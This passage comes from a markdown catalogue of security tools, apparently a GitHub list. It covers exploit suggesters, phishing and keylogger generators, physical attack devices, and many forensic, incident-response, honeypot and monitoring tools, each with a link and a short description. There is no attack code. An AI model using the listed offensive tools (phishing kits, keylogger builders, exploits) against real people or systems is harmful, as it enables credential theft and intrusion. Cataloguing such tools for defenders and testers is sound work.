Editor](https://www.ampliasecurity.com/research/windows-credentials-editor/) - Inspect logon sessions and add, change, list, and delete associated credentials, including Kerberos tickets. * [Windows Exploit Suggester](https://github.com/AonCyberLabs/Windows-Exploit-Suggester) - Suggests Windows exploits based on patch levels. #### GNU Linux Utilities * [Linus](https://cisofy.com/lynis/) - Security auditing tool for Linux and macOS. * [Linux Exploit Suggester](https://github.com/InteliSecureLabs/Linux_Exploit_Suggester) - Heuristic reporting on potentially viable exploits for a given GNU/Linux system. * [Mempodipper](https://www.exploit-db.com/exploits/18411/) - Linux Kernel 2.6.39 < 3.2.2 local privilege escalation script. * [vuls](https://github.com/future-architect/vuls) - Linux/FreeBSD agentless vulnerability scanner. #### macOS Utilities * [Bella](https://github.com/khaleds-brain/Bella) - Bella is a pure python post-exploitation data mining tool & remote administration tool for macOS. * [Linus](https://cisofy.com/lynis/) - Security auditing tool for Linux and macOS. #### Social Engineering Tools * [Beelogger](https://github.com/4w4k3/BeeLogger) - Tool for generating keylooger. * [Catphish](https://github.com/ring0lab/catphish) - Tool for phishing and corporate espionage written in Ruby. * [Evilginx](https://github.com/kgretzky/evilginx2) - MITM attack framework used for phishing credentials and session cookies from any Web service * [Gophish](https://getgophish.com/) - Open-Source Phishing Framework * [King Phisher](https://github.com/rsmusllp/king-phisher) - Phishing campaign toolkit used for creating and managing multiple simultaneous phishing attacks with custom email and server content. * [Lucy Phishing Server](https://lucysecurity.com/) - (commercial) tool to perform security awareness trainings for employees including custom phishing campaigns, malware attacks etc. Includes many useful attack templates as well as training materials to raise security awareness. * [PhishingFrenzy](https://www.phishingfrenzy.com/) - Phishing Frenzy is an Open Source Ruby on Rails application that is leveraged by penetration testers to manage email phishing campaigns. * [SET](https://github.com/trustedsec/social-engineer-toolkit) - The Social-Engineer Toolkit from TrustedSec * [wifiphisher](https://github.com/wifiphisher/wifiphisher) - Automated phishing attacks against Wi-Fi networks * [Canary Tokens](https://canarytokens.org/generate#) - Generate tokens to automatically alert users when triggered. #### Anonymity Tools * [Freenet](https://freenetproject.org/) - Freenet is a peer-to-peer platform for censorship-resistant communication and publishing. * [I2P](https://geti2p.net/en/) - The Invisible Internet Project. * [OnionScan](https://onionscan.org/) - Tool for investigating the Dark Web by finding operational security issues introduced by Tor hidden service operators. * [Tor](https://www.torproject.org/) - Free software and onion routed overlay network that helps you defend against traffic analysis. * [What Every Browser Knows About You](http://webkay.robinlinus.com/) - Comprehensive detection page to test your own Web browser's configuration for privacy and identity leaks. #### Reverse Engineering Tools * [Balbuzard](https://github.com/decalage2/balbuzard) - Malware analysis tool with reverse obfuscation. * [binwalk](https://github.com/ReFirmLabs/binwalk) - Fast, easy to use tool for analyzing, reverse engineering, and extracting firmware images. * [Capstone](https://www.capstone-engine.org/) - Lightweight multi-platform, multi-architecture disassembly framework. * [Cuckoo Modified API](https://github.com/keithjjones/cuckoo-modified-api) - Python API for Cuckoo Modified. * [Cuckoo Modified](https://github.com/brad-sp/cuckoo-modified) - Fork of Cuckoo Sandbox with multiple improvements. * [Cuckoo Sandbox](https://cuckoosandbox.org/) - Online malware scanner. * [de4dot](https://github.com/de4dot/de4dot) - .NET deobfuscator and unpacker. * [dnSpy](https://github.com/dnSpy/dnSpy) - Tool to reverse engineer .NET assemblies. * [Dovehawk] (https://github.com/tylabs/dovehawk) - Dovehawk is a Zeek module that automatically imports MISP indicators and reports Sightings * [DRAKVUF](https://github.com/tklengyel/drakvuf) - Virtualization based agentless black-box binary analysis system. * [Evan's Debugger](http://codef00.com/projects#debugger) - OllyDbg-like debugger for GNU/Linux. * [FireEye Labs Obfuscated String Solver (FLOSS)](https://github.com/fireeye/flare-floss) - Malware deobfuscator. * [firmware.re](http://firmware.re/) - Firmware analyzier. * [HaboMalHunter](https://github.com/Tencent/HaboMalHunter) - Automated malware analysis tool for Linux ELF files. * [Hybrid Analysis](https://www.hybrid-analysis.com/) - Online malware scanner. * [Immunity Debugger](https://debugger.immunityinc.com/) - Powerful way to write exploits and analyze malware. * [Interactive Disassembler (IDA Pro)](https://www.hex-rays.com/products/ida/) - Proprietary multi-processor disassembler and debugger for Windows, GNU/Linux, or macOS; also has a free version, [IDA Free](https://www.hex-rays.com/products/ida/support/download_freeware/). * [Malaice.io](https://github.com/maliceio/malice) - Open source malware analyzer. * [Malheur](https://github.com/rieck/malheur) - Automated sandbox analysis of malware behavior. * [Medusa](https://github.com/wisk/medusa) - Open source, cross-platform interactive disassembler. * [Metadefender](https://metadefender.opswat.com/#!/) - Online file and hash analyzer. * [NoMoreXOR](https://github.com/hiddenillusion/NoMoreXOR) - Frequency analysis tool for trying to crack 256-bit XOR keys. * [OllyDbg](http://www.ollydbg.de/) - x86 debugger for Windows binaries that emphasizes binary code analysis. * [PackerAttacker](https://github.com/BromiumLabs/PackerAttacker) - Generic hidden code extractor for Windows malware. * [PacketTotal](https://packettotal.com/) - Online pcap file analyzer. * [peda](https://github.com/longld/peda) - Python Exploit Development Assistance for GDB. * [plasma](https://github.com/plasma-disassembler/plasma) - Interactive disassembler for x86/ARM/MIPS. Generates indented pseudo-code with colored syntax code. * [PyREBox](https://github.com/Cisco-Talos/pyrebox) - Python scriptable Reverse Engineering sandbox by Cisco-Talos. * [Radare2](https://www.radare.org/r/index.html) - Open source, crossplatform reverse engineering framework. * [Ragpicker](https://github.com/robbyFux/Ragpicker) - Malware analysis tool. * [rVMI](https://github.com/fireeye/rVMI) - Debugger on steroids; inspect userspace processes, kernel drivers, and preboot environments in a single tool. * [Sandboxed Execution Environment](https://github.com/F-Secure/see) - Framework for building sandboxed malware execution environments. * [unXOR](https://github.com/tomchop/unxor/) - Tool that guesses XOR keys using known plaintext attacks. * [VirtualDeobfuscator](https://github.com/jnraber/VirtualDeobfuscator) - Reverse engineering tool for virtualization wrappers. * [VirusTotal](https://www.virustotal.com/gui/home/upload) - Online malware scanner. * [Voltron](https://github.com/snare/voltron) - Extensible debugger UI toolkit written in Python. * [WDK/WinDbg](https://docs.microsoft.com/en-us/windows-hardware/drivers/download-the-wdk) - Windows Driver Kit and WinDbg. * [x64dbg](https://x64dbg.com/#start) - Open source x64/x32 debugger for windows. * [xortool](https://github.com/hellman/xortool) - Tool for guessing XOR keys. #### Side-channel Tools * [ChipWhisperer](https://rtfm.newae.com/) - Complete open-source toolchain for side-channel power analysis and glitching attacks. #### Forensic Tools * [Appliance for Digital Investigation and Analysis (ADIA)](https://forensics.cert.org/#ADIA) - VMware virtual appliance for digital forensics. * [Autopsy](https://www.sleuthkit.org/autopsy/) - Graphical interface to The Sleuth Kit. * [binwalk](https://github.com/ReFirmLabs/binwalk) - Firmware analysis tool. * [bulk_extractor](https://github.com/simsong/bulk_extractor/) - Command line tool for extracting email addresses, credit card numbers, URLs, and other types of information from many types of files, including compressed files and images. * [CAINE](https://www.caine-live.net/index.html) - Italian live Linux distro for digital forensics. * [chkrootkit](http://www.chkrootkit.org/) - Checks local Linux systems for rootkits. * [Chrome URL Dumper](https://github.com/eLoopWoo/chrome-url-dumper) - Python based agent that gathers and dumps Chrome history (URLs). * [DEFT Linux](http://na.mirror.garr.it/mirrors/deft/) - Linux distro for digital forensics analysis. * [Digital Forensics Framework (DFF)](https://tools.kali.org/forensics/dff) - Open source digital forensics framework with GUI. * [docker-explorer](https://github.com/google/docker-explorer) - Docker file system forensic tool. * [Dumpzilla](https://www.dumpzilla.org/) - Python based application for dumping information from Firefox, Iceweasel, and Seamonkey browsers. * [extundelete](http://extundelete.sourceforge.net/) - ext3 and ext4 file recovery tool. * [Fast Evidence Collector Toolkit (FECT)](https://github.com/jipegit/FECT) - Lightweight digital forensics tool. * [FireEye Labs Obfuscated String Solver (FLOSS)](https://github.com/fireeye/flare-floss/) - Extract obfuscated strings from malware. * [Foremost](http://foremost.sourceforge.net/) - File recovery tool. * [GRR Rapid Response](https://github.com/google/grr) - Incident response framework focused on remote live forensics. * [Hindsight](https://github.com/obsidianforensics/hindsight) - Chrome/Chromium browser forensics tool. * [IREC](https://binalyze.com/irec/) - All in one evidence collector. * [Linux Expl0rer](https://github.com/intezer/linux-explorer) - Easy-to-use live forensics toolbox for Linux endpoints written in Python & Flask. * [magneto-malware-scanner](https://github.com/gwillem/magento-malware-scanner) - Malware scanning platform. * [nightHawk](https://github.com/biggiesmallsAG/nightHawkResponse) - Platform for digital forensics presentation, using Elasticsearch. * [PALADIN](https://sumuri.com/software/paladin/) - Linux distro for digital forensics. * [pdf-parser](https://blog.didierstevens.com/my-software/#pdf-parser) - PDF digital forensics software. * [pdfid](https://blog.didierstevens.com/my-software/#pdfid) - PDF digital forensics software. * [pdfminer](https://github.com/euske/pdfminer/) - Tool for extracting information from the text of PDF documents. * [peepdf](https://github.com/jesparza/peepdf) - Python PDF analysis tool. * [PowerForensics](https://github.com/Invoke-IR/PowerForensics) - PowerShell based digital forensics suite. * [PSRecon](https://github.com/gfoss/PSRecon/) - Windows based data gathering tool using PowerShell. * [Regripper](https://forensicswiki.xyz/wiki/index.php?title=Regripper) - Windows Registry data extraction tool. * [Rekall](http://www.rekall-forensic.com/) - Incident response and forensics tool. * [SANS Investigative Forensics Toolkit (SIFT)](https://github.com/teamdfir/sift) - Linux VM for digital forensics. * [SIFT Workstation](https://digital-forensics.sans.org/community/downloads) - Linux distro (with optional VM) for digital forensics. * [The Sleuth Kit](https://www.sleuthkit.org/sleuthkit/) - Collection of command line digital forensic utilities for investigating disk images, volume and file system data, and more. #### Memory Analysis * [Evolve](https://github.com/JamesHabben/evolve) - Web interface for Volatility advanced memory forensics framework. * [inVtero.net](https://github.com/ShaneK2/inVtero.net) - Windows x64 memory analysis tool. * [Linux Memory Extractor (LiME)](https://github.com/504ensicsLabs/LiME) - A Loadable Kernel Module (LKM) allowing for volatile memory extraction of Linux-based systems. * [Memoryze](https://www.fireeye.com/services/freeware/memoryze.html) - Memory forensics software. * [Microsoft User Mode Process Dumping](https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/user-mode-dump-files) - Dumps any running Win32 processes memory image on the fly. * [PMDump](https://vidstromlabs.com/freetools/pmdump/) - Tool for dumping memory contents of a process without stopping the process. * [Rekall](http://www.rekall-forensic.com/) - Open source tool and library for the extraction of digital artifacts from volatile memory, RAM, samples. * [Responder PRO](https://www.gosecure.net/responder-pro) - Commercial memory analysis software. * [Volatility](https://github.com/volatilityfoundation/volatility) - Advanced memory forensics framework. * [VolatilityBot](https://github.com/mkorman90/VolatilityBot) - Automation tool utilizing Volatility. * [VolDiff](https://github.com/aim4r/VolDiff) - Malware Memory Footprint Analysis based on Volatility. * [WindowsSCOPE](https://www.windowsscope.com/) - Commercial memory forensics software for Windows systems. #### Memory Imaging Tools * [Belkasoft Live RAM Capturer](https://belkasoft.com/ram-capturer) - A tiny free forensic tool to reliably extract the entire content of the computer’s volatile memory – even if protected by an active anti-debugging or anti-dumping system. * [Linux Memory Grabber](https://github.com/halpomeranz/lmg/) - A script for dumping Linux memory and creating Volatility profiles. * [Magnet RAM Capture](https://www.magnetforensics.com/resources/magnet-ram-capture/) - Magnet RAM Capture is a free imaging tool designed to capture the physical memory of a suspect’s computer. Supports recent versions of Windows. * [OSForensics](https://www.osforensics.com/) - OSForensics can acquire live memory on 32bit and 64bit systems. A dump of an individual process’s memory space or physical memory dump can be done. #### Incident Response * [APT Simulator](https://github.com/NextronSystems/APTSimulator) - Windows Batch Script that makes a system appear compromised. * [Atomic Red Team](https://atomicredteam.io/) - Set of premade tests to evaluate security posture. * [AutoTTP](https://github.com/jymcheong/AutoTTP) - Automated Tactics Techniques & Procedures, for re-issuing complex tasks. * [Belkasoft Evidence Center](https://belkasoft.com/x) - Commercial incident response suite. * [Blue Team Training Toolkit](https://www.bt3.no/) - Toolkit for preparing blue teams for defensive security. * [Caldera](https://github.com/mitre/caldera) - Automated adversary emulation system. * [CIRTKit](https://github.com/opensourcesec/CIRTKit) - Open source incident response framework. * [Cyber Triage](https://www.cybertriage.com/) - Commercial incident response suite. * [Doorman](https://github.com/mwielgoszewski/doorman) - Osquery fleet manager. * [DumpsterFire Toolset](https://github.com/TryCatchHCF/DumpsterFire) - Security event simulator. * [Falcon Orchestrator](https://github.com/CrowdStrike/falcon-orchestrator) - Windows based incident management framework. * [GRR Rapid Response](https://github.com/google/grr) - Python based incident mangement framework. * [Kolide Fleet](https://github.com/kolide/fleet) - Open source osquery manager. * [LimaCharlie](https://github.com/refractionpoint/limacharlie) - Cross-platform open source endpoint detection and response solution. * [Metta](https://github.com/uber-common/metta) - Open source adversary simulation. * [MIG - Mozilla InvestiGator](http://mozilla.github.io/mig/) - Endpoint inspection. * [MozDef](https://github.com/mozilla/MozDef) - Mozilla defense platform. * [Network Flight Simulator](https://github.com/alphasoc/flightsim) - Utility for generating malicious network traffic. * [Osquery](https://osquery.io/) - Multiplatform framework for querying operating systems similar to SQL queries. * [Red Team Automation (RTA)](https://github.com/endgameinc/RTA) - Adversary simulation framework. * [RedHunt OS](https://github.com/redhuntlabs/RedHunt-OS) - Purposely vulnerable Linux VM. * [Redline](https://www.fireeye.com/services/freeware/redline.html) - Investigative tool able to scan processes, memory, file system metadata, and more. * [Zentral](https://github.com/zentralopensource/zentral) - Monitors system events using osquery. #### Honeypot Tools * [bap - Basic Authentication honeyPot](https://github.com/bjeborn/basic-auth-pot/) - HTTP basic authentication web service honeypot. * [conpot](https://github.com/mushorg/conpot/) - ICS/SCADA honeypot. * [Cowrie Docker](https://github.com/cowrie/docker-cowrie) - Docker version of Cowrie, SSH/Telnet honeypot. * [Cowrie](https://github.com/cowrie/cowrie/) - SSH/Telnet honeypot. * [dionaea](https://github.com/DinoTools/dionaea) - Multipurpose honeypot. * [elastichoney](https://github.com/jordan-wright/elastichoney/) - Elasticsearch honeypot. * [glastopf](https://github.com/mushorg/glastopf/) - Python based web application honeypot. * [glutton](https://github.com/mushorg/glutton/) - Multipurpose honeypot. * [Modern Honey Network (mhn)](https://github.com/pwnlandia/mhn) - Multipurpose honeypot with centralized management and many integrations. * [MongoDB-HoneyProxy](https://github.com/Plazmaz/MongoDB-HoneyProxy/) - MongoDB honeypot. * [MysqlPot](https://github.com/schmalle/MysqlPot/) - MySQL honeypot. * [Nodepot](https://github.com/schmalle/Nodepot/) - NodeJS web application honeypot. * [Nosqlpot](https://github.com/torque59/nosqlpot/) - NoSQL honeypot. * [phpmyadmin_honeypot](https://github.com/gfoss/phpmyadmin_honeypot/) - PHPMyAdmin honeypot. * [Servletpot](https://github.com/schmalle/Servletpot/) - Web application honeypot written in Java, making use of Apache HttpClient libraries, MySQL connector, Cassandra connector. * [Shadow Daemon](https://github.com/zecure/shadowd/) - Collection of tools to detect, record, and prevent attacks on web applications. * [smart-honeypot](https://github.com/freak3dot/smart-honeypot/) - PHP based honeypot. * [SpamScope](https://github.com/SpamScope/spamscope/) - Spam analysis tool. * [Thug](https://github.com/buffer/thug/) - Python based honeyclient tool. * [Wordpot](https://github.com/gbrindisi/wordpot) - WordPress honeypot. * [wp-smart-honeypot](https://github.com/freak3dot/wp-smart-honeypot/) - WordPress plugin and honeypot designed to reduce comment spam. #### Monitoring and IDS-IPS * [AIEngine](https://bitbucket.org/camp0/aiengine/src/master/) - Very advanced NIDS. * [Elastic Stack](https://www.elastic.co/products/) - Also known as the ELK stack, the combination of Elasticsearch, Logstash, and Kibana, for monitoring and logging. * [OSSEC](https://www.ossec.net/) - Open source HIDS. * [Security Onion](https://github.com/Security-Onion-Solutions/security-onion) - Linux distro for monitoring. * [Snort](https://www.snort.org/) - Open source NIPS/NIDS. * [SSHWATCH](https://github.com/marshyski/sshwatch) - SSH IPS. * [Suricata](https://suricata-ids.org/) - Open source NIPS/NIDS. #### Physical Tools * [LAN Turtle](https://shop.hak5.org/products/lan-turtle) - Covert "USB Ethernet Adapter" that provides remote access, network intelligence gathering, and MITM capabilities when installed in a local network. * [PCILeech](https://github.com/ufrisk/pcileech) - Uses PCIe hardware devices to read and write from the target system memory via Direct Memory Access (DMA) over PCIe. * [Poisontap](https://samy.pl/poisontap/) - Siphons cookies, exposes internal (LAN-side) router and installs web backdoor on locked computers. * [Proxmark3](https://proxmark3.com/) - RFID/NFC cloning, replay, and spoofing toolkit often used for analyzing and attacking proximity cards/readers, wireless keys/keyfobs, and more. * [USB Rubber Ducky](https://shop.hak5.org/products/usb-rubber-ducky-deluxe) - Customizable keystroke injection attack platform masquerading as a USB thumbdrive. * [WiFi Pineapple](https://shop.hak5.org/products/wifi-pineapple) - Wireless auditing and penetration testing platform. #### Adversary Emulation * [APTSimulator](https://github.com/NextronSystems/APTSimulator) - A Windows Batch script that uses a set of tools and output files to make a system look as if it was compromised. * [Atomic Red Team](ART)](https://github.com/redcanaryco/atomic-red-team) - Small and highly portable detection tests mapped to the Mitre ATT&CK Framework. * [AutoTTP](https://github.com/jymcheong/AutoTTP) - Automated Tactics Techniques & Procedures. Re-running complex sequences manually for regression tests, product evaluations, generate data for researchers. * [Blue Team Training Toolkit](BT3)](https://www.bt3.no/) - Software for defensive security training, which will bring your network analysis training sessions, incident response drills and red team engagements to a new level. * [Caldera](https://github.com/mitre/caldera) - an automated adversary emulation system that performs post-compromise adversarial behavior within Windows Enterprise networks. It generates plans during operation using a planning system and a pre-configured adversary model based on the Adversarial Tactics, Techniques & Common Knowledge](ATT&CK™) project. * [DumpsterFire](https://github.com/TryCatchHCF/DumpsterFire) - The DumpsterFire Toolset is a modular, menu-driven, cross-platform tool for building repeatable, time-delayed, distributed security events. Easily create custom event chains for Blue Team drills and sensor / alert mapping. Red Teams can create decoy incidents, distractions, and lures to support and scale their operations. * [Metta](https://github.com/uber-common/metta) - An information security preparedness tool to do adversarial simulation. * [Network Flight Simulator](https://github.com/alphasoc/flightsim) - flightsim is a lightweight utility used to generate malicious network traffic and help security teams to evaluate security controls and network visibility. * [Red Team Automation ](RTA)](https://github.com/endgameinc/RTA) - RTA provides a framework of scripts designed to allow blue teams to test their detection capabilities against malicious tradecraft, modeled after MITRE ATT&CK. * [RedHunt-OS](https://github.com/redhuntlabs/RedHunt-OS) - A virtual machine for adversary emulation and threat hunting. #### All in one Incident Response Tools * [Belkasoft Evidence Center](https://belkasoft.com/x) - The toolkit will quickly extract digital evidence from multiple sources by analyzing hard drives, drive images, memory dumps, iOS, Blackberry and Android backups, UFED, JTAG and chip-off dumps. * [CimSweep](https://github.com/PowerShellMafia/CimSweep) - CimSweep is a suite of CIM/WMI-based tools that enable the ability to perform incident response and hunting operations remotely across all versions of Windows. * [CIRTkit](https://github.com/opensourcesec/CIRTKit) - CIRTKit is not just a collection of tools, but also a framework to aid in the ongoing unification of Incident Response and Forensics investigation processes. * [Cyber Triage](https://www.cybertriage.com/) - Cyber Triage remotely collects and analyzes endpoint data to help determine if it is compromised. It’s agentless approach and focus on ease of use and automation allows companies to respond without major infrastructure changes and without a team of forensics experts. Its results are used to decide if the system should be erased or investigated further. * [Digital Forensics Framework](https://github.com/arxsys/dff) - DFF is an Open Source computer forensics platform built on top of a dedicated Application Programming Interface. DFF proposes an alternative to the aging digital forensics solutions used today. Designed for simple use and automation, the DFF interface guides the user through the main steps of a digital investigation so it can be used by both professional and non-expert to quickly and easily conduct a digital investigations and perform incident response. * [Doorman](https://github.com/mwielgoszewski/doorman) - Doorman is an osquery fleet manager that allows remote management of osquery configurations retrieved by nodes. It takes advantage of osquery's TLS configuration, logger, and distributed read/write endpoints, to give administrators visibility across a fleet of devices with minimal overhead and intrusiveness. * [Envdb](https://github.com/mephux/envdb) - Envdb turns your production, dev, cloud, etc environments into a database cluster you can search using osquery as the foundation. It wraps the osquery process with a cluster node agent that can communicate back to a central location. * [Falcon Orchestrator](https://github.com/CrowdStrike/falcon-orchestrator) - Falcon Orchestrator by CrowdStrike is an extendable Windows-based application that provides workflow automation, case management and security response functionality. * [GRR Rapid Response](https://github.com/google/grr) - GRR Rapid Response is an incident response framework focused on remote live forensics. It consists of a python agent client that is installed on target systems, and a python server infrastructure that can manage and talk to the agent. * [Kolide Fleet](https://github.com/kolide/fleet) - Kolide Fleet is a state of the art host monitoring platform tailored for security experts. Leveraging Facebook's battle-tested osquery project, Kolide delivers fast answers to big questions. * [Limacharlie](https://github.com/refractionpoint/limacharlie) - an endpoint security platform. It is itself a collection of small projects all working together, and gives you a cross-platform, Windows, OSX, Linux, Android and iOS, low-level environment allowing you to manage and push additional modules into memory to extend its functionality. * [MIG](http://mozilla.github.io/mig/) - Mozilla Investigator, MIG, is a platform to perform investigative surgery on remote endpoints. It enables investigators to obtain information from large numbers of systems in parallel, thus accelerating investigation of incidents and day-to-day operations security. * [MozDef](https://github.com/mozilla/MozDef) - The Mozilla Defense Platform, MozDef, seeks to automate the security incident handling process and facilitate the real-time activities of incident handlers. * [nightHawk](https://github.com/biggiesmallsAG/nightHawkResponse) - the nightHawk Response Platform is an application built for asynchronus forensic data presentation using ElasticSearch as the backend. It's designed to ingest Redline collections. * [Open Computer Forensics Architecture](https://sourceforge.net/projects/ocfa/) - Open Computer Forensics Architecture, OCFA, is another popular distributed open-source computer forensics framework. This framework was built on Linux platform and uses postgreSQL database for storing data. * [Osquery](https://osquery.io/) - with osquery you can easily ask questions about your Linux and OSX infrastructure. Whether your goal is intrusion detection, infrastructure reliability, or compliance, osquery gives you the ability to empower and inform a broad set of organizations within your company. Queries in the -incident-response pack - help you detect and respond to breaches. * [Redline](https://www.fireeye.com/services/freeware/redline.html) - provides host investigative capabilities to users to find signs of malicious activity through memory and file analysis, and the development of a threat assessment profile. * [The Sleuth Kit & Autopsy](https://www.sleuthkit.org/) - The Sleuth Kit is a Unix and Windows based tool which helps in forensic analysis of computers. It comes with various tools which helps in digital forensics. These tools help in analyzing disk images, performing in-depth analysis of file systems, and various other things. * [TheHive](https://thehive-project.org/) - TheHive is a scalable 3-in-1 open source and free solution designed to make life easier for SOCs, CSIRTs, CERTs and any information security practitioner dealing with security incidents that need to be investigated and acted upon swiftly. * [X-Ways Forensics](https://www.x-ways.net/forensics/) - X-Ways is a forensics tool for Disk cloning and imaging. It can be used to find deleted files and disk analysis. * [Zentral](https://github.com/zentralopensource/zentral) - combines osquery's powerful endpoint inventory features with a flexible notification and action framework. This enables one to identify and react to changes on OS X and Linux clients. #### Disk Image Creation Tools * [AccessData FTK Imager](https://accessdata.com/product-download/?/support/adownloads#FTKImager) - AccessData FTK Imager is a forensics tool whose main purpose is to preview recoverable data from a disk of any kind. FTK Imager can also acquire live memory and paging file on 32bit and 64bit systems. * [Bitscout](https://github.com/vitaly-kamluk/bitscout) - Bitscout by Vitaly Kamluk helps you build your fully-trusted customizable LiveCD/LiveUSB image to be used for remote digital forensics, or perhaps any other task of your choice. It is meant to be transparent and monitorable by the owner of the system, forensically sound, customizable and compact. * [GetData Forensic Imager](https://getdataforensics.com/product/fex-imager/) - GetData Forensic Imager is a Windows based program that will acquire, convert, or verify a forensic image in one of the following common forensic file formats. * [Guymager](https://guymager.sourceforge.io/) - Guymager is a free forensic imager for media acquisition on Linux. * [Magnet ACQUIRE](https://www.magnetforensics.com/resources/magnet-acquire/) - ACQUIRE by Magnet Forensics allows various types of disk acquisitions to be performed on Windows, Linux, and OS X as well as mobile operating systems. #### Evidence Collection Tools * [Bulk_extractor](https://github.com/simsong/bulk_extractor) - bulk_extractor is a computer forensics tool that scans a disk image, a file, or a directory of files and extracts useful information without parsing the file system or file system structures. Because of ignoring the file system structure, the program distinguishes itself in terms of speed and thoroughness. * [Cold Disk Quick Response](https://github.com/orlikoski/CDQR) - uses a streamlined list of parsers to quickly analyze a forenisic image file, dd, E01, .vmdk, etc, and output nine reports. * [Ir-rescue](https://github.com/diogo-fernan/ir-rescue) - -ir-rescue - is a Windows Batch script and a Unix Bash script to comprehensively collect host forensic data during incident response. * [Live Response Collection](https://www.brimorlabs.com/tools/) - The Live Response collection by BriMor Labs is an automated tool that collects volatile data from Windows, OSX, and -nix based operating systems. #### Incident Management Tools * [Cortex XSOAR](https://www.paloaltonetworks.com/cortex/xsoar) - Security orchestration tool. Formerly Demisto community edition. Offers full Incident lifecycle management, Incident Closure Reports, team assignments and collaboration, and many integrations to enhance automations, like Active Directory, PagerDuty, Jira and much more. * [CyberCPR](https://www.cybercpr.com) - A community and commercial incident management tool with Need-to-Know built in to support GDPR compliance while handling sensitive incidents. * [Cyphon](https://www.cyphon.io/) - Cyphon eliminates the headaches of incident management by streamlining a multitude of related tasks through a single platform. It receives, processes and triages events to provide an all-encompassing solution for your analytic workflow — aggregating data, bundling and prioritizing alerts, and empowering analysts to investigate and document incidents. * [FIR](https://github.com/certsocietegenerale/FIR/) - Fast Incident Response, FIR, is an cybersecurity incident management platform designed with agility and speed in mind. It allows for easy creation, tracking, and reporting of cybersecurity incidents and is useful for CSIRTs, CERTs and SOCs alike. * [RTIR](https://bestpractical.com/rtir/) - Request Tracker for Incident Response, RTIR, is the premier open source incident handling system targeted for computer security teams. We worked with over a dozen CERT and CSIRT teams around the world to help you handle the ever-increasing volume of incident reports. RTIR builds on all the features of Request Tracker. * [SCOT](https://getscot.sandia.gov/) - Sandia Cyber Omni Tracker, SCOT, is an Incident Response collaboration and knowledge capture tool focused on flexibility and ease of use. Our goal is to add value to the incident response process without burdening the user. * [Threat_note](https://github.com/DefensePointSecurity/threat_note) - A lightweight investigation notebook that allows security researchers the ability to register and retrieve indicators related to their research. #### Linux Forensics Distributions * [ADIA](https://forensics.cert.org/#ADIA) - The Appliance for Digital Investigation and Analysis, ADIA, is a VMware-based appliance used for digital investigation and acquisition and is built entirely from public domain software. Among the tools contained in ADIA are Autopsy, the Sleuth Kit, the Digital Forensics Framework, log2timeline, Xplico, and Wireshark. Most of the system maintenance uses Webmin. It is designed for small-to-medium sized digital investigations and acquisitions. The appliance runs under Linux, Windows, and Mac OS. Both i386 32-bit and x86_64 versions are available. * [CAINE](https://www.caine-live.net/index.html) - The Computer Aided Investigative Environment, CAINE, contains numerous tools that help investigators during their analysis, including forensic evidence collection. * [CCF-VM](https://github.com/orlikoski/Skadi) - CyLR CDQR Forensics Virtual Machine, CCF-VM: An all-in-one solution to parsing collected data, making it easily searchable with built-in common searches, enable searching of single and multiple hosts simultaneously. * [DEFT](http://na.mirror.garr.it/mirrors/deft/) - The Digital Evidence & Forensics Toolkit, DEFT, is a Linux distribution made for computer forensic evidence collection. It comes bundled with the Digital Advanced Response Toolkit, DART, for Windows. A light version of DEFT, called DEFT Zero, is also available, which is focused primarily on forensically sound evidence collection. * [NST - Network Security Toolkit](https://sourceforge.net/projects/nst/files/latest/download?source=files) - Linux distribution that includes a vast collection of best-of-breed open source network security applications useful to the network security professional. * [PALADIN](https://sumuri.com/software/paladin/) - PALADIN is a modified Linux distribution to perform various forenics task in a forensically sound manner. It comes with many open source forensics tools included. * [Security Onion](https://github.com/Security-Onion-Solutions/security-onion) - Security Onion is a special Linux distro aimed at network security monitoring featuring advanced analysis tools. * [SIFT Workstation](http://digital-forensics.sans.org/community/downloads) - The SANS Investigative Forensic Toolkit, SIFT, Workstation demonstrates that advanced incident response capabilities and deep dive digital forensic techniques to intrusions can be accomplished using cutting-edge open-source tools that are freely available and frequently updated. #### Linux Evidence Collection * [FastIR Collector Linux](https://github.com/SekoiaLab/Fastir_Collector_Linux) - FastIR for Linux collects different artefacts on live Linux and records the results in csv files. #### Log Analysis Tools * [Logdissect](https://github.com/dogoncouch/logdissect) - A CLI utility and Python API for analyzing log files and other data. * [Lorg](https://github.com/jensvoid/lorg) - a tool for advanced HTTPD logfile security analysis and forensics. #### OSX Evidence Collection * [Knockknock](https://wiert.me/2020/02/10/github-synack-knockknock-whos-there/) - Displays persistent items, scripts, commands, binaries, etc., that are set to execute automatically on OSX. * [Mac_apt - macOS Artifact Parsing Tool](https://github.com/ydkhatri/mac_apt) - Plugin based forensics framework for quick mac triage that works on live machines, disk images or individual artifact files. * [OSX Auditor](https://github.com/jipegit/OSXAuditor) - OSX Auditor is a free Mac OS X computer forensics tool. * [OSX Collector](https://github.com/yelp/osxcollector) - An OSX Auditor offshoot for live response. #### Incident Response Playbooks * [IR Workflow Gallery](https://www.incidentresponse.com/playbooks/) - Different generic incident response workflows, e.g. for malware outbreak, data theft, unauthorized access,... Every workflow constists of seven steps: prepare, detect, analyze, contain, eradicate, recover, post-incident handling. * [IRM](https://github.com/certsocietegenerale/IRM) - Incident Response Methodologies by CERT Societe Generale. * [PagerDuty Incident Response Documentation](https://github.com/PagerDuty/incident-response-docs) - Documents that describe parts of the PagerDuty Incident Response process. It provides information not only on preparing for an incident, but also what to do during and after. #### Process Dump Tools * [Microsoft User Mode Process Dumping](https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/user-mode-dump-files) - User mode process dumping guide. * [PMDump](https://vidstromlabs.com/freetools/pmdump/) - PMDump is a tool that lets you dump the memory contents of a process to a file without stopping the process. #### Sandboxing/reversing tools * [Cuckoo](https://github.com/cuckoosandbox) - Open Source Highly configurable sandboxing tool. * [Cuckoo-modified](https://github.com/spender-sandbox/cuckoo-modified) - Heavily modified Cuckoo fork developed by community. * [Cuckoo-modified-api](https://github.com/keithjjones/cuckoo-modified-api) - A Python library to control a cuckoo-modified sandbox. * [Hybrid-Analysis](https://www.hybrid-analysis.com/) - Hybrid-Analysis is a free powerful online sandbox by Payload Security. * [Malwr](https://malwr.ee/) - Malwr is a free online malware analysis service and community, which is powered by the Cuckoo Sandbox. * [Mastiff](https://github.com/KoreLogicSecurity/mastiff) - MASTIFF is a static analysis framework that automates the process of extracting key characteristics from a number of different file formats. * [Metadefender Cloud](https://metadefender.opswat.com/) - Metadefender is a free threat intelligence platform providing multiscanning, data sanitization and vulnerability assesment of files. * [Viper](https://github.com/viper-framework/viper) - Viper is a python based binary analysis and management framework, that works well with Cuckoo and YARA * 